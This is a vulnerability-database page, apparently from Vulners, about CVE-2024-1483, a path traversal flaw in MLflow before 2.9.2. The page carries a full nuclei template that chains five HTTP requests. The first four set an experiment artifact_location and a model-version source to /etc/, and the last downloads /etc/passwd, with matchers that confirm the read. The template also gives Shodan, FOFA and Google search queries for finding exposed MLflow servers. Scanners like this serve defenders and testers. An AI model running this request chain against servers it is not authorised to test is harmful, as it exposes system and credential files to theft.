Lucene search
K

Mlflow < 2.9.2 - Path Traversal

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

A path traversal vulnerability exists in mlflow/mlflow version 2.9.2 allowing attackers to access arbitrary files on the server by crafting a series of HTTP POST requests with specially crafted parameters

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-1483
2 Dec 202400:37
circl
CNNVD
Mlflow 路径遍历漏洞
15 Apr 202400:00
cnnvd
CNVD
Mlflow Path Traversal Vulnerability (CNVD-2024-35608)
19 Apr 202400:00
cnvd
CVE
CVE-2024-1483
16 Apr 202400:00
cve
Cvelist
CVE-2024-1483 Path Traversal Vulnerability in mlflow/mlflow
16 Apr 202400:00
cvelist
Github Security Blog
mlflow Path Traversal vulnerability
16 Apr 202400:30
github
NVD
CVE-2024-1483
16 Apr 202400:15
nvd
OSV
BIT-MLFLOW-2024-1483 Path Traversal Vulnerability in mlflow/mlflow
4 Feb 202507:22
osv
OSV
GHSA-F82R-JJ5R-6G97 mlflow Path Traversal vulnerability
16 Apr 202400:30
osv
Positive Technologies
PT-2024-18084 · Mlflow · Mlflow
15 Apr 202400:00
ptsecurity
Rows per page
id: CVE-2024-1483

info:
  name: Mlflow < 2.9.2 - Path Traversal
  author: gy741
  severity: high
  description: |
    A path traversal vulnerability exists in mlflow/mlflow version 2.9.2, allowing attackers to access arbitrary files on the server. By crafting a series of HTTP POST requests with specially crafted 'artifact_location' and 'source' parameters, using a local URI with '#' instead of '?', an attacker can traverse the server's directory structure. The issue occurs due to insufficient validation of user-supplied input in the server's handlers.
  impact: |
    Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
  remediation: |
    To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
  reference:
    - https://huntr.com/bounties/52a3855d-93ff-4460-ac24-9c7e4334198d
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1483
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1483
    cwe-id: CWE-29
    epss-score: 0.02718
    epss-percentile: 0.84237
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: lfprojects
    product: mlflow
    shodan-query: "http.title:\"mlflow\""
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects,vuln

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"}

      - |
        POST /api/2.0/mlflow/runs/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"experiment_id": "{{EXPERIMENT_ID}}"}

      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}"}

      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}", "run_id": "{{RUN_ID}}", "source": "file:///etc/"}

      - |
        GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body_5
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header_5
        words:
          - "filename=passwd"
          - "application/octet-stream"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body_1
        name: EXPERIMENT_ID
        group: 1
        json:
          - '.experiment_id'
        internal: true

      - type: json
        part: body_2
        name: RUN_ID
        group: 1
        json:
          - '.run.info.run_id'
        internal: true
# digest: 4a0a00473045022055a8760dd2e77ca5eead880028e5d9fed9bdcd0a2bcaf00f6bb5ab439047d6d602210089772edd2d62c6e359e8ee070eda96da0d89c62d3f90f06baddc178dbfd98f64:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
CVSS 37.5
EPSS0.02718
SSVC
34